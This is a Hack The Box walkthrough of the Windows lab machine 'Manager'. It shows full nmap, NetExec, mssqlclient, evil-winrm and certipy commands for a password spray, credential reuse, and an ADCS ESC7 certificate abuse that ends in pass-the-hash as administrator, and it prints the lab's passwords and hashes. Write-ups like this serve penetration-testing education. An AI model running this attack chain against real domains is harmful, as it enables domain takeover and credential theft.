HTB - Manager
Description
Manager is a medium difficulty Windows machine which hosts an Active Directory environment with AD CS (Active Directory Certificate Services), a web server, and an SQL server. The foothold involves enumerating users using RID cycling and performing a password spray attack to gain access to the MSSQL service. The xp_dirtree procedure is then used to explore the filesystem, uncovering a website backup in the web-root. Extracting the backup reveals credentials that are reused to WinRM to the server. Finally, the attacker escalates privileges through AD CS via ESC7 exploitation.
Enumeration
Nmap Scan
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Manager]
└──╼ $ nmap -p- --min-rate 10000 $ip -Pn -oN Nmap/all-ports-scan
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
1433/tcp open ms-sql-s
5985/tcp open wsman
49693/tcp open unknown
49782/tcp open unknown
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Manager]
└──╼ $ nmap -p53,80,88,135,139,389,445,1433,5985 -sCV $ip -oN Nmap/script-scan
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Manager
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-03 01:37:39Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.manager.htb
| Not valid before: 2024-08-30T17:08:51
|_Not valid after: 2122-07-27T10:31:04
|_ssl-date: 2024-11-03T01:38:28+00:00; +7h00m00s from scanner time.
445/tcp open microsoft-ds?
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-11-01T19:35:12
|_Not valid after: 2054-11-01T19:35:12
|_ssl-date: 2024-11-03T01:38:28+00:00; +7h00m01s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Manager]
└──╼ $ sudo nmap -sU -p1-10000 --min-rate 10000 $ip -Pn
PORT STATE SERVICE
53/udp open domain
88/udp open kerberos-sec
123/udp open ntp
389/udp open ldapSummary
* Open ports: 53,80,88,135,139,389,445,1433,5985
* UDP open ports: 53,88,123,389
* Services: DNS - HTTP - KERBEROS - RPC - SMB - MSSQL -winRM
* Important notes: Domain: manager.htb - DNS:dc01.manager.htbhosts file
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Manager]
└──╼ $sudo sh -c "echo '$ip dc01 dc01.manager.htb manager.htb' >> /etc/hosts"
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Manager]
└──╼ $tail -n1 /etc/hosts
10.10.11.236 dc01 dc01.manager.htb manager.htbService Enumeration
HTTP Enumeration
I don't get anything new from fuzzing files and directories from those I find in the website
No many things are in this web app as it seems to be a static website, So I will switch to other services running on this box
SMB & RPC Enumeration
I don't get anything useful permissions on the shares, but I get the users on the domain using rid bruting
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Manager]
└──╼ $nxc smb dc01 -u 'guest' -p '' --shares
SMB 10.10.11.236 445 DC01 [+] manager.htb\guest:
SMB 10.10.11.236 445 DC01 [*] Enumerated shares
SMB 10.10.11.236 445 DC01 Share Permissions Remark
SMB 10.10.11.236 445 DC01 ----- ----------- ------
SMB 10.10.11.236 445 DC01 ADMIN$ Remote Admin
SMB 10.10.11.236 445 DC01 C$ Default share
SMB 10.10.11.236 445 DC01 IPC$ READ Remote IPC
SMB 10.10.11.236 445 DC01 NETLOGON Logon server share
SMB 10.10.11.236 445 DC01 SYSVOL Logon server share 
Foothold
Since I don't have any password yet, I will try to brute the password as the user's name and I get a hit
I can brute MSSQL login, too
With valid credentials, I will look at the shared access and MSSQL database. When I looked at the share, I didn't get interesting things here so will move to mssql
And I'm in the database :))
When I deal with mssql, I perform checklist for possible attack paths, So I will create one
Check for admin Access
Check the databases for juicy info and secrets
Check the possibility capture the
mssqlservice accountCheck for impersonating other users
Check for trustworthy database
Check for Linked Server
Check for Read or Write Access to the file system
Check for executing commands with
xp_cmdshell
With this List, I can move forward and I will use mssqlclient.py built-in commands
SQL> SELECT IS_SRVROLEMEMBER('sysadmin')
-----------
0
SQL (MANAGER\Operator guest@master)> enum_db
name is_trustworthy_on
------ -----------------
master 0
tempdb 0
model 0
msdb 1
SQL (MANAGER\Operator guest@master)> enum_owner
Database Owner
-------- -----
master sa
tempdb sa
model sa
msdb sa
SQL (MANAGER\Operator guest@master)> enum_links
SRV_NAME SRV_PROVIDERNAME SRV_PRODUCT SRV_DATASOURCE SRV_PROVIDERSTRING SRV_LOCATION SRV_CAT
--------------- ---------------- ----------- --------------- ------------------ ------------ -------
DC01\SQLEXPRESS SQLNCLI SQL Server DC01\SQLEXPRESS NULL NULL NULL
SQL (MANAGER\Operator guest@master)> enum_impersonate
execute as database permission_name state_desc grantee grantor
---------- -------- --------------- ---------- ------- ------- Till now, I don't get any possible path and when I even tried to get the hash of the service account, I got the hash of the machine account which is uncrackable
The last thing I can try is check read or write access to the file system. I will use xp_dirtree to list the directories in a path.
Lateral Movement
With IIS web server running on the box, I can try to read web.config or an important file on its directory inetpub. Here are several interesting files web.config & website-backup-27-07-23-old.zip
When I tried to access the web.config trough web, it gave me file not found.
but when I tried to access the .zip file, It was downloaded
I created a new directory, moved the zip file to it, unzipped it and list the content. there is an odd .xml file
It contain credential for raven user.
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Manager/website-backup]
└──╼ $cat .old-conf.xml
..snip..
<access-user>
<user>raven@manager.htb</user>
<password>R4v3nBe5tD3veloP3r!123</password>
</access-user>
..snip..These credentials are valid and I have access to Winrm, too :))
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Manager/website-backup]
└──╼ $evil-winrm -i dc01 -u raven -p 'R4v3nBe5tD3veloP3r!123'
*Evil-WinRM* PS C:\Users\Raven\Documents> type ..\Desktop\user.txt
518fbc8e81299098bac6e8654ae731a1User Flag: 518fbc8e81299098bac6xxxxxxxxxxxxx
Privilege Escalation
Looking at the account privs and groups, I noticed that he is a member of Certificate Service DCOM Access which means PKI existence
I can confirm with NetExec using ADCS module
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Manager/website-backup]
└──╼ $nxc ldap dc01 -u raven -p 'R4v3nBe5tD3veloP3r!123' -M adcs
LDAP 10.10.11.236 389 DC01 [+] manager.htb\raven:R4v3nBe5tD3veloP3r!123
ADCS 10.10.11.236 389 DC01 [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'
ADCS 10.10.11.236 389 DC01 Found PKI Enrollment Server: dc01.manager.htb
ADCS 10.10.11.236 389 DC01 Found CN: manager-DC01-CAWhen dealing with ADCS, I hurry to enumerate possible ESCALATION (ESC) paths using certipy
Then, I will also use certipy to find vunerable templates or permissions
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Manager/website-backup]
└──╼ $certipy find -u raven -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236 -vulnerable -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Trying to get CA configuration for 'manager-DC01-CA' via CSRA
[*] Got CA configuration for 'manager-DC01-CA'
[*] Enumeration output:
Certificate Authorities
0
CA Name : manager-DC01-CA
DNS Name : dc01.manager.htb
Certificate Subject : CN=manager-DC01-CA, DC=manager, DC=htb
Certificate Serial Number : 5150CE6EC048749448C7390A52F264BB
Certificate Validity Start : 2023-07-27 10:21:05+00:00
Certificate Validity End : 2122-07-27 10:31:04+00:00
Web Enrollment : Disabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : MANAGER.HTB\Administrators
Access Rights
Enroll : MANAGER.HTB\Operator
MANAGER.HTB\Authenticated Users
MANAGER.HTB\Raven
ManageCertificates : MANAGER.HTB\Administrators
MANAGER.HTB\Domain Admins
MANAGER.HTB\Enterprise Admins
ManageCa : MANAGER.HTB\Administrators
MANAGER.HTB\Domain Admins
MANAGER.HTB\Enterprise Admins
MANAGER.HTB\Raven
[!] Vulnerabilities
ESC7 : 'MANAGER.HTB\\Raven' has dangerous permissionsuser
ravenhasEnrollandManageCArights which means he can enroll new certificate and edit permission on any template, So I can make it vulnerable toESC4The built-in
SubCAtemplate is also enabled (as it is by default). This template is vulnerable toESC1but only permitsDomain AdminsandEnterprise Adminsto enroll.The certificate is present and enabled (
Enabled: True). If theSubCAcertificate is disabled we should enable it.Since we have ManageCA rights, we can assign
ManageCertificaterights to any account.
Exploitation Path
Enable
SubCAtemplateGrant
ManageCertificaterightsRequest certificate for
SubCAtemplate impersonatingadministratorApprove the enrollment request as
ravenAccess the machine as an administrator
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Manager/website-backup]
└──╼ $certipy ca -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -ca manager-DC01-CA -enable-template 'SubCA'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Successfully enabled 'SubCA' on 'manager-DC01-CA'Grant ManageCertificate rights
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Manager/website-backup]
└──╼ $certipy ca -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -ca manager-DC01-CA -add-officer raven
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Successfully added officer 'Raven' on 'manager-DC01-CA'Confirm the new permission
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Manager/website-backup]
└──╼ $ certipy find -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -stdout -dc-ip 10.10.11.236
..snip..
ManageCertificates : MANAGER.HTB\Administrators
MANAGER.HTB\Domain Admins
MANAGER.HTB\Enterprise Admins
MANAGER.HTB\RavenWith the
SubCAtemplate enabled and withManageCertificatesrights, we can request a certificate by adding an alternativeSANand selecting theSubCAtemplate.
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Manager/website-backup]
└──╼ $certipy req -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -ca manager-DC01-CA -template SubCA -upn Administrator
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
[*] Request ID is 20
Would you like to save the private key? (y/N) y
[*] Saved private key to 20.key
[-] Failed to request certificateWe need to save the requested ID
20, and respond yes to the question:Would you like to save the private key? (y/N). We will need this private key to retrieve the certificate later.
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Manager/website-backup]
└──╼ $certipy ca -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -ca manager-DC01-CA -issue-request 20
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Successfully issued certificate
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Manager/website-backup]
└──╼ $certipy req -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -ca manager-DC01-CA -retrieve 20
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Rerieving certificate with ID 20
[*] Successfully retrieved certificate
[*] Got certificate with UPN 'Administrator'
[*] Certificate has no object SID
[*] Loaded private key from '20.key'
[*] Saved certificate and private key to 'administrator.pfx'Now I can authenticate as an administrator with the .pfx file
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Manager/website-backup]
└──╼ $certipy auth -pfx administrator.pfx -domain manager.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@manager.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@manager.htb': aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924efAccess the machine
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Manager/website-backup]
└──╼ $evil-winrm -i dc01 -u administrator -H ae5064c2f62317332c88629e025924ef
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
5fa4f9480b1bba44627e3fcfaf5a08a5Root Flag: 5fa4f9480b1bba44627exxxxxxxxxxxxxxxx
Last updated